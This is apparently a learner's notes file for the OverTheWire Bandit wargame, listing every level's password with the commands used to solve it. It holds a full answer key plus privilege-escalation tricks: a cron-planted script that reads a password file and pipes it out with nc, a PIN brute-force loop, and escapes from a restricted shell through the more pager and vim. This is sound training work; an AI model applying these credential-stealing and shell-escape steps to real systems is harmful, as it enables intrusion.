ctfs/overthewire/bandit/passwords.md
2025-07-15 22:44:06 +10:00

bandit0: bandit0

bandit1: ZjLjTmM6FvvyRnrb2rfNWOZOTa6ip5If
	`cat readme`

bandit2: 263JGJPfgU6LtdEvgfWU1XP5yac29mFx
	`cat ./-`

bandit3: MNk8KNH3Usiio41PRUEoDFPqfxLPlSmx

bandit4: 2WmrDFRmJIq3IPxneAaMGhap0pFhF3NJ

bandit5: 4oQYVPkxZOOEOO5pTW81FB8j8lxXGUQw

bandit6: HWasnPhtq9AVKe0dmk45nxy20cvUa6EG
	`find inhere/ -type f -print 2>/dev/null | xargs -d '\n' ls -l | grep 1033`

bandit7: morbNTDkSW6jIlUc0ymOdMaLnOlFVAaj
	`cat $(find / -type f -user bandit7 -group bandit6 2>/dev/null)`

bandit8: dfwvzFQi4mU0wfNbFOe9RoWskMLg7eEc
	`<data.txt grep millionth`

bandit9: 4CKMh1JI91bUIZZPXDqGanal4xvAg0JM
	`sort data.txt | uniq -u`

bandit10: FGUW5ilLVJrxX9kMYMmlN4MgbpfMiqey
	`strings data.txt | grep "^=="`

bandit11: dtR173fZKb0RRsDFSGsg2RWnpNVj3qRr
	`cat data.txt | base64 -d`

bandit12: 7x16WNeHIi5YkIhWsfFIqoognUTyj9Q4
	`<data.txt tr 'A-Za-z' 'N-ZA-Mn-za-m'`

bandit13: FO5dwFsc0cbaIiH0h8J2eUks2vdTDwAn
```bash
#!/usr/bin/env bash
set -e
WORKING=$(mktemp -d)
xxd -r ~/data.txt $WORKING/data.bin
# then run `tar xf`, `gzip -d`, `bzip2 -d` a million times
```

bandit14: MU4VWeTyJk8ROof1qqmcBPaLh7lDCPvS
```bash
#!/usr/bin/env bash
KEY="./id_bandit14"
scp -P 2220 bandit13@bandit.labs.overthewire.org:~/sshkey.private $KEY
ssh-keygen -y -f $KEY > "$KEY.pub"
chmod 600 $KEY*
# login with private key
ssh bandit14@bandit.labs.overthewire.org -p 2220 -i ./id_bandit14
# >>> cat /etc/bandit_pass/bandit14
```

bandit15: 8xCjnmgoKbGLhHFAZlGE5Tmu4M2tKJQo
	`echo "MU4VWeTyJk8ROof1qqmcBPaLh7lDCPvS" | nc localhost 30000`

bandit16: kSkvUpMQ7lBYyCM4GBPvCvT1BfWRy0Dx
	`openssl s_client -connect localhost:30001`

bandit17: STORED IN keys/id_bandit17*
```bash
# get all open ports
nmap localhost -T5 -p31000-32000 | grep open | awk '{print substr($1, 1, 5)}'
```

bandit18: x2gLTTjFwMOhQ8oWNbMN362QKxfRqGlO
	`diff passwords.old passwords.new`

bandit19: cGWpMaKXVwDUNgPAVJbWYuGHVn9zl3j8
	`ssh bandit19@bandit.labs.overthewire.org -p 2220 -t /bin/sh`

bandit20: 0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO
	`./bandit20-do cat /etc/bandit_pass/bandit20`

bandit21: EeoULMCra2q0dSkYj561DX7s1CpBuOBt
```bash
tmux new -s imbaud
# Ctrl-b + "
BOX=$(mktemp) && echo "0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO" > $BOX && <$BOX nc -l -p 5555
# Ctrl-b + o
~/suconnect 5555
```

bandit22: tRae0UfB9v0UzbCdn9cY0gQnds9GF58Q
	/etc/cron.d/cronjob_bandit22 references the binary /usr/bin/cronjob_bandit22.sh, which complains about
	bad privileges for /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv; then cat out the temp file and BOOM.

bandit23: 0Zf11ioIjMVN551jX3CmStKLYqjk54Ga
	Similar solution to the previous one with /etc/cron.d/cronjob_bandit23:
	`cat /tmp/$(echo I am user bandit23 | md5sum | cut -d ' ' -f 1)`

bandit24: gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8
```bash
# terminal 1:
nc -l -p 5555
# terminal 2:
echo -e "#\!/bin/bash\ncat /etc/bandit_pass/bandit24 | nc localhost 5555" > /var/spool/bandit24/foo/gibme
```

bandit25: iCi86ttT4KSNe1armKiwbQNmB3YJP3q4
```bash
python3 -c "from itertools import product; [print(''.join(D)) for D in product((str(x) for x in range(10)), repeat=4)]" | xargs -L1 echo "gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8" | nc localhost 30002 | grep -v "Wrong"
```

bandit26: s0773xxkk0MXfdqOfPRVr9L3jJBUOgCZ
	First copy the private key from bandit25's home.
	Then `cat /etc/passwd | grep bandit26` to find what shell bandit26 uses:
	`# bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext`
	`cat /usr/bin/showtext` to see it runs the more pager then exits.
	more will enter "command" mode if the terminal window is too small to view the paged contents,
	which allows us to run the v command, which opens the content in vim instead.
	Next, do `:set shell=/bin/bash` and then run vim's `:shell` to GTFO.

bandit27: upsNCc7vzaRDx6oZC6GiR6ERwe1MowGB
	From bandit26 in bash: `./bandit27-do cat /etc/bandit_pass/bandit27`

bandit28: Yz9IpL0sBcCeuG7m9uQFt8ZNpS4HZRcN
```bash
BOX=$(mktemp -d); echo $BOX
git clone ssh://bandit27-git@localhost:2220/home/bandit27-git/repo $BOX # use same password as bandit27 login
cd $BOX
# then check README
```

bandit29: 4pT1t5DENaYuqnqvadYs1oE4QLCdjmJ7
	Do the same as bandit28 for /home/bandit28-git/repo, then:
	`git show fb0df1358b1ff146f581651a84bae622353a71c0:README.md`

bandit30: qp30ex3VLz5MDG1n91YowTv4Q8l7CDZL
	Do what bandit29 did, but then:
```bash
git branch -r # list all remote branches
git fetch --all
```

bandit31: fb5S2xb7bRyFmAvQYQGEqsbhVyJqhnDy
	Similar to bandit30 but use:
```bash
git tag
git show secret # show the "secret" tag
```

bandit32: 3O9RfhqyAlVBEZpVb6LYStshZoqoSx5K
	Simply `rm .gitignore`, then `git add .; git commit -m "AHHHHH"; git push -u origin`

bandit33: tQdtbs5D5i2vJwkO8mEyYEyTL8izoeJ0
```bash
# use symbols since uppercase messes everything up
$0 # the shell runs "sh <CMD>" so "sh $0" => "sh sh"
cat /etc/bandit_pass/bandit33
```
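The bandit13 step above just says to run `tar xf`, `gzip -d` and `bzip2 -d` "a million times". Added example, not from the original notes: a script that reads each layer's magic bytes and peels it off until plain data remains, so the wrapping order never has to be guessed by hand. It assumes the hexdump has already been reversed with `xxd -r` into a binary file, that each tar layer wraps a single member, and the function names `layer_type` and `unwrap` are my own.

```bash
#!/usr/bin/env bash
# Added example: peel nested gzip / bzip2 / tar layers off a blob until plain
# data remains, detecting every layer by its magic bytes instead of guessing.
set -eu

# Classify $1 as gzip, bzip2, tar or data by reading its magic bytes.
layer_type() {
  local f="$1" magic
  magic=$(head -c 2 "$f" | od -An -tx1 | tr -d ' \n')
  case "$magic" in
    1f8b) echo gzip;  return ;;   # gzip: 1f 8b
    425a) echo bzip2; return ;;   # bzip2: "BZ"
  esac
  # POSIX/GNU tar headers carry "ustar" at byte offset 257.
  if [ "$(tail -c +258 "$f" 2>/dev/null | head -c 5)" = "ustar" ]; then
    echo tar; return
  fi
  echo data
}

# Repeatedly unwrap $1 in a scratch directory and print the path of the
# innermost (non-container) file. Stops after 50 layers so a malformed or
# deliberately endless (decompression-bomb style) blob cannot loop forever.
unwrap() {
  local work cur next kind member i
  work=$(mktemp -d)
  cur="$work/layer0"
  cp "$1" "$cur"
  for i in $(seq 1 50); do
    kind=$(layer_type "$cur")
    next="$work/layer$i"
    case "$kind" in
      gzip)  gzip -dc "$cur" > "$next" ;;
      bzip2) bzip2 -dc "$cur" > "$next" ;;
      tar)
        mkdir "$next.d"
        tar -xf "$cur" -C "$next.d"
        # assumption: each tar layer wraps exactly one member; take the first file
        member=$(find "$next.d" -type f | head -n 1)
        mv "$member" "$next" ;;
      data)  echo "$cur"; return 0 ;;
    esac
    cur="$next"
  done
  echo "gave up after 50 layers" >&2
  return 1
}

# For the bandit13 step: cat "$(unwrap "$WORKING/data.bin")"
```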

>>> bandit33@bandit:~/README.md <<<
Congratulations on solving the last level of this game!

At this moment, there are no more levels to play in this game. However, we are constantly working
on new levels and will most likely expand this game with more levels soon.
Keep an eye out for an announcement on our usual communication channels!
In the meantime, you could play some of our other wargames.

If you have an idea for an awesome new level, please let us know!

Learnings:

Connect over SSL/TLS (like telnet/nc does) using openssl:
	`openssl s_client -connect HOST:PORT -quiet`
	Note: commands starting with "k" will trigger "KEYUPDATE";
	run openssl with the `-quiet` flag to avoid this
	https://docs.openssl.org/3.0/man1/openssl-s_client/#connected-commands

The pager "more" goes into a command mode if the terminal is too small to display
the content, which allows us to run any command we want.

Git:
	git show <COMMIT>:file/path/here # print a file's content at a specific commit
	git branch -r # list all branches stored on the remote